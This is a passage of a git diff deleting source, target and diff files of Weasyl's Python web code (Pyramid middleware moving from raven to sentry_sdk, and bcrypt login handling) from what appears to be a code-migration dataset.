)', u')') % ParameterCounter() - debug_rows.append(u'%.1f ms%s

' % (t * 1000, html.escape(statement))) - - response.text += u''.join( - [u''] - + debug_rows - + [u'
'] - ) - - def query_debug_tween(request): - if 'query_debug' in request.params: - request.query_debug = [] - request.add_response_callback(callback) - - return handler(request) - - return query_debug_tween - - -def status_check_tween_factory(handler, registry): - """ - A tween that checks if the weasyl user is banned, suspended, etc. and redirects appropriately. - - Rather than performing these checks on every view. - """ - def status_check_tween(request): - status = d.common_status_check(request.userid) - if status: - return Response(d.common_status_page(request.userid, status)) - return handler(request) - return status_check_tween - - -def database_session_cleanup_tween_factory(handler, registry): - """ - A tween that cleans up the thread-local database session after every request. - """ - def database_session_cleanup_tween(request): - def cleanup(request): - d.sessionmaker.remove() - - request.add_finished_callback(cleanup) - return handler(request) - - return database_session_cleanup_tween - - -def _generate_http2_server_push_headers(): - """ - Generates the Link headers to load HTTP/2 Server Push resources which are needed on each pageload. Written - as a separate function to only execute this code a single time, since we just need to generate this each - time the code is relaunched (e.g., each time the web workers are kicked to a new version of the code). - - A component of ``http2_server_push_tween_factory`` - :return: An ASCII encoded string to be loaded into the Link header set inside of ``http2_server_push_tween_factory`` - """ - css_preload = [ - '<' + item + '>; rel=preload; as=style' for item in [ - d.get_resource_path('css/site.css'), - d.get_resource_path('fonts/museo500.css'), - ] - ] - - js_preload = [ - '<' + item + '>; rel=preload; as=script' for item in [ - d.get_resource_path('js/jquery-2.2.4.min.js'), - d.get_resource_path('js/scripts.js'), - ] - ] - - return ", ".join(css_preload + js_preload) - - -# Part of the `Link` header that will be set in the `http2_server_push_tween_factory` function, below -HTTP2_LINK_HEADER_PRELOADS = _generate_http2_server_push_headers() - - -def http2_server_push_tween_factory(handler, registry): - """ - Add the 'Link' header to outgoing responses to HTTP/2 Server Push render-blocking resources - """ - def http2_server_push(request): - resp = handler(request) - - # Combined HTTP/2 headers indicating which resources to server push - resp.headers['Link'] = HTTP2_LINK_HEADER_PRELOADS - return resp - return http2_server_push - - -# Properties and methods to enhance the pyramid `request`. -def pg_connection_request_property(request): - """ - Used for the reified pg_connection property on weasyl requests. - """ - return d.sessionmaker() - - -def userid_request_property(request): - """ - Used for the userid property on weasyl requests. - """ - api_token = request.headers.get('X_WEASYL_API_KEY') - authorization = request.headers.get('AUTHORIZATION') - if api_token is not None: - # TODO: If reification of userid becomes an issue (e.g. because of userid changing after sign-in) revisit this. - # It's possible that we don't need to reify the entire property, but just cache the result of this query in a - # cache on arguments inner function. - userid = d.engine.scalar("SELECT userid FROM api_tokens WHERE token = %(token)s", token=api_token) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Weasyl-API-Key', 'realm="Weasyl"')) - return userid - - elif authorization: - from weasyl.oauth2 import get_userid_from_authorization - userid = get_userid_from_authorization(request) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Bearer', 'realm="Weasyl" error="invalid_token"')) - return userid - - else: - userid = request.weasyl_session.userid - return 0 if userid is None else userid - - -def log_exc_request_method(request, **kwargs): - """ - Method on requests to log exceptions. - """ - # It's unclear to me why this should be a request method and not just define.log_exc(). - return request.environ.get('raven.captureException', lambda **kw: traceback.print_exc())(**kwargs) - - -def web_input_request_method(request, *required, **kwargs): - """ - Callable that processes the pyramid request.params multidict into a web.py storage object - in the style of web.input(). - TODO: Replace usages of this method with accessing request directly. - - @param request: The pyramid request object. - @param kwargs: Default values. If a default value is a list, it indicates that multiple - values of that key should be collapsed into a list. - @return: A dictionary-like object in the fashion of web.py's web.input() - """ - return storify(request.params.mixed(), *required, **kwargs) - - -# Methods to add response callbacks to a request. The callbacks run in the order they -# were registered. Note that these will not run if an exception is thrown that isn't handled by -# our exception view. -def set_cookie_on_response(request, name=None, value='', max_age=None, path='/', domain=None, - secure=False, httponly=False, comment=None, overwrite=False): - """ - Registers a callback on the request to set a cookie in the response. - Parameters have the same meaning as ``pyramid.response.Response.set_cookie``. - """ - def callback(request, response): - response.set_cookie(name, value, max_age, path, domain, secure, httponly, comment, - overwrite) - request.add_response_callback(callback) - - -def delete_cookie_on_response(request, name, path='/', domain=None): - """ - Register a callback on the request to delete a cookie from the client. - Parameters have the same meaning as ``pyramid.response.Response.delete_cookie``. - """ - def callback(request, response): - response.delete_cookie(name, path, domain) - request.add_response_callback(callback) - - -def weasyl_exception_view(exc, request): - """ - A view for general exceptions thrown by weasyl code. - """ - if isinstance(exc, ClientGoneAway): - if 'raven.captureMessage' in request.environ: - request.environ['raven.captureMessage']('HTTP client went away', level=logging.INFO) - return request.response - else: - # Avoid using the reified request.userid property here. It might not be set and it might - # have changed due to signin/out. - if hasattr(request, 'weasyl_session'): - userid = request.weasyl_session.userid - else: - userid = 0 - request.userid = 0 # To keep templates happy. - errorpage_kwargs = {} - if isinstance(exc, WeasylError): - status_code = errorcode.error_status_code.get(exc.value, 422) - if exc.render_as_json: - return Response(json={'error': {'name': exc.value}}, - status_code=status_code) - errorpage_kwargs = exc.errorpage_kwargs - if exc.value in errorcode.error_messages: - message = errorcode.error_messages[exc.value] - if exc.error_suffix: - message = '%s %s' % (message, exc.error_suffix) - return Response(d.errorpage(userid, message, **errorpage_kwargs), - status_code=status_code) - request_id = None - if 'raven.captureException' in request.environ: - request_id = base64.b64encode(os.urandom(6), b'+-').decode('ascii') - event_id = request.environ['raven.captureException'](request_id=request_id) - request_id = '%s-%s' % (event_id, request_id) - print("unhandled error (request id %s) in %r" % (request_id, request.environ)) - traceback.print_exc() - if getattr(exc, "__render_as_json", False): - return Response(json={'error': {}}, status_code=500) - else: - return Response(d.errorpage(userid, request_id=request_id, **errorpage_kwargs), status_code=500) - - -class RemoveSessionCookieProcessor(raven.processors.Processor): - """ - Removes Weasyl session cookies. - """ - def _filter_header(self, value): - return re.sub( - r'WZL=(\w+)', - lambda match: 'WZL=' + '*' * len(match.group(1)), - value) - - def filter_http(self, data): - if 'cookies' in data: - data['cookies'] = self._filter_header(data['cookies']) - - if 'headers' in data and 'Cookie' in data['headers']: - data['headers']['Cookie'] = self._filter_header(data['headers']['Cookie']) - - env = data.get('env') - - if env is not None: - if 'HTTP_COOKIE' in env: - env['HTTP_COOKIE'] = self._filter_header(env['HTTP_COOKIE']) - - # WebOb cache, like: - # - webob._parsed_query_vars - # - webob._body_file - # - webob._parsed_post_vars - # - webob._parsed_cookies - # These mostly just repeat information that can be found elsewhere, - # so they’re removed rather than filtered. - remove_keys = [key for key in env if key.startswith('webob._')] - for key in remove_keys: - del env[key] - - -class URLSchemeFixingMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - if environ.get('HTTP_X_FORWARDED_PROTO') == 'https': - environ['wsgi.url_scheme'] = 'https' - return self.app(environ, start_response) - - -class SentryEnvironmentMiddleware(object): - def __init__(self, app, dsn, reactor=None): - self.app = app - self.client = raven.Client( - dsn=dsn, - release=d.CURRENT_SHA, - processors=[ - 'raven.processors.SanitizePasswordsProcessor', - 'weasyl.middleware.RemoveSessionCookieProcessor', - ], - ) - if reactor is None: - from twisted.internet import reactor - self.reactor = reactor - - def ravenCaptureArguments(self, level=None, **extra): - request = get_current_request() - data = { - 'level': level, - 'user': { - 'id': d.get_userid(), - 'ip_address': d.get_address(), - }, - 'request': { - 'url': request.environ['PATH_INFO'], - 'method': request.environ['REQUEST_METHOD'], - 'data': request.POST, - 'query_string': request.environ['QUERY_STRING'], - 'headers': http.get_headers(request.environ), - 'env': request.environ, - }, - } - - return { - 'data': data, - 'extra': dict( - extra, - session=getattr(request, 'weasyl_session', None), - ), - } - - def captureException(self, **extra): - kwargs = self.ravenCaptureArguments(**extra) - exc_info = sys.exc_info() - return blockingCallFromThread( - self.reactor, self.client.captureException, exc_info, **kwargs) - - def captureMessage(self, message, **extra): - kwargs = self.ravenCaptureArguments(**extra) - return blockingCallFromThread( - self.reactor, self.client.captureMessage, message, **kwargs) - - def __call__(self, environ, start_response): - environ['raven.captureException'] = self.captureException - environ['raven.captureMessage'] = self.captureMessage - return self.app(environ, start_response) - - -def _wrapperfunc(name): - def wrap(self, *a, **kw): - meth = getattr(self._wrapped, name) - try: - return meth(*a, **kw) - except ValueError: - raise ClientGoneAway() - return wrap - - -class InputWrap(object): - def __init__(self, wrapped): - self._wrapped = wrapped - - read = _wrapperfunc('read') - readline = _wrapperfunc('readline') - readlines = _wrapperfunc('readlines') - - def __iter__(self): - it = iter(self._wrapped) - while True: - try: - yield next(it) - except StopIteration: - return - except ValueError: - raise ClientGoneAway() - - -class InputWrapMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - environ['wsgi.input'] = InputWrap(environ['wsgi.input']) - return self.app(environ, start_response) - - -@event.listens_for(Engine, 'before_cursor_execute') -def before_cursor_execute(conn, cursor, statement, parameters, context, executemany): - context._query_start_time = time.perf_counter() - - -@event.listens_for(Engine, 'after_cursor_execute') -def after_cursor_execute(conn, cursor, statement, parameters, context, executemany): - total = time.perf_counter() - context._query_start_time - request = get_current_request() # TODO: There should be a better way to save this. - if hasattr(request, 'sql_times'): - request.sql_times.append(total) - if hasattr(request, 'query_debug'): - request.query_debug.append((statement, total)) diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py deleted file mode 100644 index 20dfc45..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py +++ /dev/null @@ -1,415 +0,0 @@ -import html -import re -import secrets -import time -import traceback - -from pyramid.httpexceptions import HTTPUnauthorized -from pyramid.response import Response -from pyramid.threadlocal import get_current_request -from sentry_sdk import capture_exception, capture_message, push_scope, set_user -from sqlalchemy import event -from sqlalchemy.engine import Engine -from web.utils import storify - -from libweasyl import staff -from libweasyl.cache import ThreadCacheProxy -from libweasyl.models.users import GuestSession -from weasyl import define as d -from weasyl import errorcode -from weasyl import orm -from weasyl.error import WeasylError -from weasyl.sessions import create_guest_session, is_guest_token - - -class ClientGoneAway(Exception): - pass - - -def cache_clear_tween_factory(handler, registry): - """ - A tween to clear the thread local cache. - """ - def cache_clear_tween(request): - try: - return handler(request) - finally: - ThreadCacheProxy.zap_cache() - return cache_clear_tween - - -def db_timer_tween_factory(handler, registry): - """ - A tween that records timing information in the headers of a response. - """ - def db_timer_tween(request): - started_at = time.perf_counter() - request.sql_times = [] - request.memcached_times = [] - resp = handler(request) - ended_at = time.perf_counter() - time_in_sql = sum(request.sql_times) - time_in_memcached = sum(request.memcached_times) - time_in_python = ended_at - started_at - time_in_sql - time_in_memcached - resp.headers['X-SQL-Time-Spent'] = '%0.1fms' % (time_in_sql * 1000,) - resp.headers['X-Memcached-Time-Spent'] = '%0.1fms' % (time_in_memcached * 1000,) - resp.headers['X-Python-Time-Spent'] = '%0.1fms' % (time_in_python * 1000,) - resp.headers['X-SQL-Queries'] = str(len(request.sql_times)) - resp.headers['X-Memcached-Queries'] = str(len(request.memcached_times)) - return resp - return db_timer_tween - - -def session_tween_factory(handler, registry): - """ - A tween that sets a weasyl_session on a request. - """ - def callback(request, response): - sess_obj = request.weasyl_session - - if isinstance(sess_obj, GuestSession): - if sess_obj.create: - response.set_cookie('WZL', sess_obj.sessionid, max_age=None, - secure=request.scheme == 'https', httponly=True) - elif sess_obj.save: - session = request.pg_connection - - if sess_obj.create: - session.add(sess_obj) - response.set_cookie('WZL', sess_obj.sessionid, max_age=60 * 60 * 24 * 365, - secure=request.scheme == 'https', httponly=True) - session.flush() - - # TODO(hyena): Investigate a pyramid session_factory implementation instead. - def session_tween(request): - sess_obj = None - cookie = request.cookies.get('WZL') - - if cookie is not None: - if is_guest_token(cookie): - sess_obj = GuestSession(cookie) - else: - sess_obj = request.pg_connection.query(orm.Session).get(cookie) - - if sess_obj is None: - sess_obj = create_guest_session() - - request.weasyl_session = sess_obj - - set_user( - {"id": sess_obj.userid} if sess_obj.userid - else {"ip_address": request.client_addr}) - - # Register a response callback to set the session cookies before returning. - # Note that this requires that exceptions are handled properly by our exception view. - request.add_response_callback(callback) - return handler(request) - - return session_tween - - -def query_debug_tween_factory(handler, registry): - """ - A tween that allows developers to view timing per query. - """ - def callback(request, response): - if not hasattr(request, 'weasyl_session') or request.weasyl_session.userid not in staff.DEVELOPERS: - return - - class ParameterCounter(object): - def __init__(self): - self.next = 1 - self.ids = {} - - def __getitem__(self, name): - id = self.ids.get(name) - - if id is None: - id = self.ids[name] = self.next - self.next += 1 - - return u'$%i' % (id,) - - debug_rows = [] - - for statement, t in request.query_debug: - statement = u' '.join(statement.split()).replace(u'( ', u'(').replace(u' )', u')') % ParameterCounter() - debug_rows.append(u'%.1f ms%s

' % (t * 1000, html.escape(statement))) - - response.text += u''.join( - [u''] - + debug_rows - + [u'
'] - ) - - def query_debug_tween(request): - if 'query_debug' in request.params: - request.query_debug = [] - request.add_response_callback(callback) - - return handler(request) - - return query_debug_tween - - -def status_check_tween_factory(handler, registry): - """ - A tween that checks if the weasyl user is banned, suspended, etc. and redirects appropriately. - - Rather than performing these checks on every view. - """ - def status_check_tween(request): - status = d.common_status_check(request.userid) - if status: - return Response(d.common_status_page(request.userid, status)) - return handler(request) - return status_check_tween - - -def database_session_cleanup_tween_factory(handler, registry): - """ - A tween that cleans up the thread-local database session after every request. - """ - def database_session_cleanup_tween(request): - def cleanup(request): - d.sessionmaker.remove() - - request.add_finished_callback(cleanup) - return handler(request) - - return database_session_cleanup_tween - - -def _generate_http2_server_push_headers(): - """ - Generates the Link headers to load HTTP/2 Server Push resources which are needed on each pageload. Written - as a separate function to only execute this code a single time, since we just need to generate this each - time the code is relaunched (e.g., each time the web workers are kicked to a new version of the code). - - A component of ``http2_server_push_tween_factory`` - :return: An ASCII encoded string to be loaded into the Link header set inside of ``http2_server_push_tween_factory`` - """ - css_preload = [ - '<' + item + '>; rel=preload; as=style' for item in [ - d.get_resource_path('css/site.css'), - d.get_resource_path('fonts/museo500.css'), - ] - ] - - js_preload = [ - '<' + item + '>; rel=preload; as=script' for item in [ - d.get_resource_path('js/jquery-2.2.4.min.js'), - d.get_resource_path('js/scripts.js'), - ] - ] - - return ", ".join(css_preload + js_preload) - - -# Part of the `Link` header that will be set in the `http2_server_push_tween_factory` function, below -HTTP2_LINK_HEADER_PRELOADS = _generate_http2_server_push_headers() - - -def http2_server_push_tween_factory(handler, registry): - """ - Add the 'Link' header to outgoing responses to HTTP/2 Server Push render-blocking resources - """ - def http2_server_push(request): - resp = handler(request) - - # Combined HTTP/2 headers indicating which resources to server push - resp.headers['Link'] = HTTP2_LINK_HEADER_PRELOADS - return resp - return http2_server_push - - -# Properties and methods to enhance the pyramid `request`. -def pg_connection_request_property(request): - """ - Used for the reified pg_connection property on weasyl requests. - """ - return d.sessionmaker() - - -def userid_request_property(request): - """ - Used for the userid property on weasyl requests. - """ - api_token = request.headers.get('X_WEASYL_API_KEY') - authorization = request.headers.get('AUTHORIZATION') - if api_token is not None: - # TODO: If reification of userid becomes an issue (e.g. because of userid changing after sign-in) revisit this. - # It's possible that we don't need to reify the entire property, but just cache the result of this query in a - # cache on arguments inner function. - userid = d.engine.scalar("SELECT userid FROM api_tokens WHERE token = %(token)s", token=api_token) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Weasyl-API-Key', 'realm="Weasyl"')) - return userid - - elif authorization: - from weasyl.oauth2 import get_userid_from_authorization - userid = get_userid_from_authorization(request) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Bearer', 'realm="Weasyl" error="invalid_token"')) - return userid - - else: - userid = request.weasyl_session.userid - return 0 if userid is None else userid - - -def web_input_request_method(request, *required, **kwargs): - """ - Callable that processes the pyramid request.params multidict into a web.py storage object - in the style of web.input(). - TODO: Replace usages of this method with accessing request directly. - - @param request: The pyramid request object. - @param kwargs: Default values. If a default value is a list, it indicates that multiple - values of that key should be collapsed into a list. - @return: A dictionary-like object in the fashion of web.py's web.input() - """ - return storify(request.params.mixed(), *required, **kwargs) - - -# Methods to add response callbacks to a request. The callbacks run in the order they -# were registered. Note that these will not run if an exception is thrown that isn't handled by -# our exception view. -def set_cookie_on_response(request, name=None, value='', max_age=None, path='/', domain=None, - secure=False, httponly=False, comment=None, overwrite=False): - """ - Registers a callback on the request to set a cookie in the response. - Parameters have the same meaning as ``pyramid.response.Response.set_cookie``. - """ - def callback(request, response): - response.set_cookie(name, value, max_age, path, domain, secure, httponly, comment, - overwrite) - request.add_response_callback(callback) - - -def delete_cookie_on_response(request, name, path='/', domain=None): - """ - Register a callback on the request to delete a cookie from the client. - Parameters have the same meaning as ``pyramid.response.Response.delete_cookie``. - """ - def callback(request, response): - response.delete_cookie(name, path, domain) - request.add_response_callback(callback) - - -def weasyl_exception_view(exc, request): - """ - A view for general exceptions thrown by weasyl code. - """ - if isinstance(exc, ClientGoneAway): - capture_message('HTTP client went away') - return request.response - else: - # Avoid using the reified request.userid property here. It might not be set and it might - # have changed due to signin/out. - if hasattr(request, 'weasyl_session'): - userid = request.weasyl_session.userid - else: - userid = 0 - request.userid = 0 # To keep templates happy. - errorpage_kwargs = {} - if isinstance(exc, WeasylError): - status_code = errorcode.error_status_code.get(exc.value, 422) - if exc.render_as_json: - return Response(json={'error': {'name': exc.value}}, - status_code=status_code) - errorpage_kwargs = exc.errorpage_kwargs - if exc.value in errorcode.error_messages: - message = errorcode.error_messages[exc.value] - if exc.error_suffix: - message = '%s %s' % (message, exc.error_suffix) - return Response(d.errorpage(userid, message, **errorpage_kwargs), - status_code=status_code) - request_id = secrets.token_urlsafe(6) - with push_scope() as scope: - scope.set_tag('request_id', request_id) - event_id = capture_exception(exc) - if event_id is not None: - request_id = '%s-%s' % (event_id, request_id) - print("unhandled error (request id %s) in %r" % (request_id, request.environ)) - traceback.print_exc() - if getattr(exc, "__render_as_json", False): - return Response(json={'error': {}}, status_code=500) - else: - return Response(d.errorpage(userid, request_id=request_id, **errorpage_kwargs), status_code=500) - - -def strip_session_cookie(event, hint): - if request := event.get('request'): - if (headers := request.get('headers')) and 'Cookie' in headers: - headers['Cookie'] = re.sub( - r'(WZL="?)([^";]+)', - lambda match: match.group(1) + '*' * len(match.group(2)), - headers['Cookie'] - ) - if (cookies := request.get('cookies')) and 'WZL' in cookies: - cookies['WZL'] = '*' * len(cookies['WZL']) - return event - - -class URLSchemeFixingMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - if environ.get('HTTP_X_FORWARDED_PROTO') == 'https': - environ['wsgi.url_scheme'] = 'https' - return self.app(environ, start_response) - - -def _wrapperfunc(name): - def wrap(self, *a, **kw): - meth = getattr(self._wrapped, name) - try: - return meth(*a, **kw) - except ValueError: - raise ClientGoneAway() - return wrap - - -class InputWrap(object): - def __init__(self, wrapped): - self._wrapped = wrapped - - read = _wrapperfunc('read') - readline = _wrapperfunc('readline') - readlines = _wrapperfunc('readlines') - - def __iter__(self): - it = iter(self._wrapped) - while True: - try: - yield next(it) - except StopIteration: - return - except ValueError: - raise ClientGoneAway() - - -class InputWrapMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - environ['wsgi.input'] = InputWrap(environ['wsgi.input']) - return self.app(environ, start_response) - - -@event.listens_for(Engine, 'before_cursor_execute') -def before_cursor_execute(conn, cursor, statement, parameters, context, executemany): - context._query_start_time = time.perf_counter() - - -@event.listens_for(Engine, 'after_cursor_execute') -def after_cursor_execute(conn, cursor, statement, parameters, context, executemany): - total = time.perf_counter() - context._query_start_time - request = get_current_request() # TODO: There should be a better way to save this. - if hasattr(request, 'sql_times'): - request.sql_times.append(total) - if hasattr(request, 'query_debug'): - request.query_debug.append((statement, total)) diff --git a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff b/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff deleted file mode 100644 index 05e7a08..0000000 --- a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.diff +++ /dev/null @@ -1,33 +0,0 @@ -diff --git a/weasyl/login.py b/weasyl/login.py - index 67a8735c7d9650c5e0075fa2993bd3919280fc6e..f6230c731f662be1301bdc38f6ab9815c7441144 100644 - --- a/weasyl/login.py - +++ b/weasyl/login.py -@@ -69,11 +69,12 @@ def authenticate_bcrypt(username, password, session=True): - return 0, "invalid" - - USERID, HASHSUM, SETTINGS = query -+ HASHSUM = HASHSUM.encode('utf-8') - - d.metric('increment', 'attemptedlogins') - - unicode_success = bcrypt.checkpw(password.encode('utf-8'), HASHSUM) -- if not unicode_success and not bcrypt.checkpw(d.plaintext(password), HASHSUM): -+ if not unicode_success and not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), HASHSUM): - # Log the failed login attempt in a security log if the account the user - # attempted to log into is a privileged account - if USERID in staff.MODS: -@@ -276,12 +277,12 @@ def update_unicode_password(userid, password, password_confirm): - - hashpw = d.engine.scalar(""" - SELECT hashsum FROM authbcrypt WHERE userid = %(userid)s -- """, userid=userid) -+ """, userid=userid).encode('utf-8') - - if bcrypt.checkpw(password.encode('utf-8'), hashpw): - return - -- if not bcrypt.checkpw(d.plaintext(password), hashpw): -+ if not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), hashpw): - raise WeasylError('passwordIncorrect') - - d.engine.execute(""" diff --git a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py b/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py deleted file mode 100644 index dce983d..0000000 --- a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.source.py +++ /dev/null @@ -1,304 +0,0 @@ -# login.py - -import arrow -import bcrypt -from sqlalchemy.sql.expression import select - -from libweasyl import security -from libweasyl import staff - -from weasyl import define as d -from weasyl import macro as m -from weasyl import emailer -from weasyl import moderation -from weasyl.error import WeasylError - - -_EMAIL = 100 -_PASSWORD = 10 -_USERNAME = 25 - - -def signin(userid): - # Update the last login record for the user - d.execute("UPDATE login SET last_login = %i WHERE userid = %i", [d.get_time(), userid]) - - # set the userid on the session - sess = d.web.ctx.weasyl_session - sess.userid = userid - sess.save = True - - -def signout(userid): - sess = d.web.ctx.weasyl_session - # unset SFW-mode cookie on logout - d.web.setcookie("sfwmode", "nsfw", -1) - if sess.additional_data.get('user-stack'): - sess.userid = sess.additional_data['user-stack'].pop() - sess.additional_data.changed() - else: - sess.userid = None - sess.save = True - - -def authenticate_bcrypt(username, password, session=True): - """ - Return a result tuple of the form (userid, error); `error` is None if the - login was successful. Pass `session` as False to authenticate a user without - creating a new session. - - Possible errors are: - - "invalid" - - "unexpected" - - "address" - - "banned" - - "suspended" - """ - # Check that the user entered potentially valid values for `username` and - # `password` before attempting to authenticate them - if not username or not password: - return 0, "invalid" - - # Select the authentication data necessary to check that the the user-entered - # credentials are valid - query = d.execute("SELECT ab.userid, ab.hashsum, lo.settings FROM authbcrypt ab" - " RIGHT JOIN login lo USING (userid)" - " WHERE lo.login_name = '%s'", [d.get_sysname(username)], ["single"]) - - if not query: - return 0, "invalid" - - USERID, HASHSUM, SETTINGS = query - - d.metric('increment', 'attemptedlogins') - - unicode_success = bcrypt.checkpw(password.encode('utf-8'), HASHSUM) - if not unicode_success and not bcrypt.checkpw(d.plaintext(password), HASHSUM): - # Log the failed login attempt in a security log if the account the user - # attempted to log into is a privileged account - if USERID in staff.MODS: - d.append_to_log('login.fail', userid=USERID, ip=d.get_address()) - d.metric('increment', 'failedlogins') - - # Return a zero userid and an error code (indicating the entered password - # was incorrect) - return 0, "invalid" - elif "b" in SETTINGS: - # Return the proper userid and an error code (indicating the user's account - # has been banned) - return USERID, "banned" - elif "s" in SETTINGS: - suspension = moderation.get_suspension(USERID) - - if d.get_time() > suspension.release: - d.execute("UPDATE login SET settings = REPLACE(settings, 's', '') WHERE userid = %i", [USERID]) - d.execute("DELETE FROM suspension WHERE userid = %i", [USERID]) - d.get_login_settings.invalidate(USERID) - else: - # Return the proper userid and an error code (indicating the user's - # account has been temporarily suspended) - return USERID, "suspended" - - # Attempt to create a new session if `session` is True, then log the signin - # if it succeeded. - if session: - signin(USERID) - d.append_to_log('login.success', userid=USERID, ip=d.get_address()) - d.metric('increment', 'logins') - - status = None - if not unicode_success: - # Oops; the user's password was stored badly, but they did successfully authenticate. - status = 'unicode-failure' - # Either way, authentication succeeded, so return the userid and a status. - return USERID, status - - -def passhash(password): - return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(m.MACRO_BCRYPT_ROUNDS)) - - -def password_secure(password): - """ - Return True if the password meets requirements, else False. - """ - return len(password) >= _PASSWORD - - -# form -# username email month -# password emailcheck year -# passcheck day - -def create(form): - # Normalize form data - username = d.plaintext(form.username[:_USERNAME]) - sysname = d.get_sysname(username) - - email = emailer.normalize_address(form.email) - emailcheck = emailer.normalize_address(form.emailcheck) - - password = form.password - passcheck = form.passcheck - - if form.day and form.month and form.year: - try: - birthday = arrow.Arrow(int(form.year), int(form.month), int(form.day)) - except ValueError: - raise WeasylError("birthdayInvalid") - else: - birthday = None - - # Check mismatched form data - if password != passcheck: - raise WeasylError("passwordMismatch") - if email != emailcheck: - raise WeasylError("emailMismatch") - - # Check invalid form data - if birthday is None or d.age_in_years(birthday) < 13: - raise WeasylError("birthdayInvalid") - if not password_secure(password): - raise WeasylError("passwordInsecure") - if not email: - raise WeasylError("emailInvalid") - if not sysname or ";" in username: - raise WeasylError("usernameInvalid") - if sysname in ["admin", "administrator", "mod", "moderator", "weasyl", - "weasyladmin", "weasylmod", "staff", "security"]: - raise WeasylError("usernameInvalid") - if email_exists(email): - raise WeasylError("emailExists") - if username_exists(sysname): - raise WeasylError("usernameExists") - - # Create pending account - token = security.generate_key(40) - - d.engine.execute(d.meta.tables["logincreate"].insert(), { - "token": token, - "username": username, - "login_name": sysname, - "hashpass": passhash(password), - "email": email, - "birthday": birthday, - "unixtime": arrow.now(), - }) - - # Queue verification email - emailer.append([email], None, "Weasyl Account Creation", d.render( - "email/verify_account.html", [token, sysname])) - d.metric('increment', 'createdusers') - - -def verify(token): - lo = d.meta.tables["login"] - lc = d.meta.tables["logincreate"] - query = d.engine.execute(lc.select().where(lc.c.token == token)).first() - - if not query: - raise WeasylError("logincreateRecordMissing") - - db = d.connect() - with db.begin(): - # Create login record - userid = db.execute(lo.insert().returning(lo.c.userid), { - "login_name": d.get_sysname(query.username), - "last_login": arrow.now(), - "email": query.email, - }).scalar() - - # Create profile records - db.execute(d.meta.tables["authbcrypt"].insert(), { - "userid": userid, - "hashsum": query.hashpass, - }) - db.execute(d.meta.tables["profile"].insert(), { - "userid": userid, - "username": query.username, - "full_name": query.username, - "unixtime": arrow.now(), - "config": "kscftj", - }) - db.execute(d.meta.tables["userinfo"].insert(), { - "userid": userid, - "birthday": query.birthday, - }) - db.execute(d.meta.tables["userstats"].insert(), { - "userid": userid, - }) - db.execute(d.meta.tables["welcomecount"].insert(), { - "userid": userid, - }) - - # Update logincreate records - db.execute(lc.delete().where(lc.c.token == token)) - - d.metric('increment', 'verifiedusers') - - -def email_exists(email): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE email = %(email)s) OR - EXISTS (SELECT 0 FROM logincreate WHERE email = %(email)s) - """, email=email).scalar() - - -def username_exists(login_name): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE login_name = %(name)s) OR - EXISTS (SELECT 0 FROM useralias WHERE alias_name = %(name)s) OR - EXISTS (SELECT 0 FROM logincreate WHERE login_name = %(name)s) - """, name=login_name).scalar() - - -def settings(userid, setting=None): - if setting: - return d.execute("SELECT settings ~ '%s' FROM login WHERE userid = %i", - [setting, userid], options="bool") - else: - return d.execute("SELECT settings FROM login WHERE userid = %i", - [userid], options="element") - - -def sessionid(userid): - return d.execute("SELECT sessionid FROM usersession WHERE userid = %i", - [userid], options="element") - - -def update_unicode_password(userid, password, password_confirm): - if password != password_confirm: - raise WeasylError('passwordMismatch') - if not password_secure(password): - raise WeasylError('passwordInsecure') - - hashpw = d.engine.scalar(""" - SELECT hashsum FROM authbcrypt WHERE userid = %(userid)s - """, userid=userid) - - if bcrypt.checkpw(password.encode('utf-8'), hashpw): - return - - if not bcrypt.checkpw(d.plaintext(password), hashpw): - raise WeasylError('passwordIncorrect') - - d.engine.execute(""" - UPDATE authbcrypt SET hashsum = %(hashsum)s WHERE userid = %(userid)s - """, userid=userid, hashsum=passhash(password)) - - -def get_account_verification_token(email=None, username=None): - email = email and emailer.normalize_address(email) - username = username and d.get_sysname(username) - - logincreate = d.meta.tables['logincreate'] - statement = select([logincreate.c.token]) - - if email: - statement = statement.where(logincreate.c.email.ilike(email)) - else: - statement = statement.where(logincreate.c.login_name == username) - - return d.engine.execute(statement).scalar() diff --git a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py b/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py deleted file mode 100644 index 41ed84e..0000000 --- a/v1/data/codefile/weasyl@weasyl__f6230c7__weasyl$login.py.target.py +++ /dev/null @@ -1,305 +0,0 @@ -# login.py - -import arrow -import bcrypt -from sqlalchemy.sql.expression import select - -from libweasyl import security -from libweasyl import staff - -from weasyl import define as d -from weasyl import macro as m -from weasyl import emailer -from weasyl import moderation -from weasyl.error import WeasylError - - -_EMAIL = 100 -_PASSWORD = 10 -_USERNAME = 25 - - -def signin(userid): - # Update the last login record for the user - d.execute("UPDATE login SET last_login = %i WHERE userid = %i", [d.get_time(), userid]) - - # set the userid on the session - sess = d.web.ctx.weasyl_session - sess.userid = userid - sess.save = True - - -def signout(userid): - sess = d.web.ctx.weasyl_session - # unset SFW-mode cookie on logout - d.web.setcookie("sfwmode", "nsfw", -1) - if sess.additional_data.get('user-stack'): - sess.userid = sess.additional_data['user-stack'].pop() - 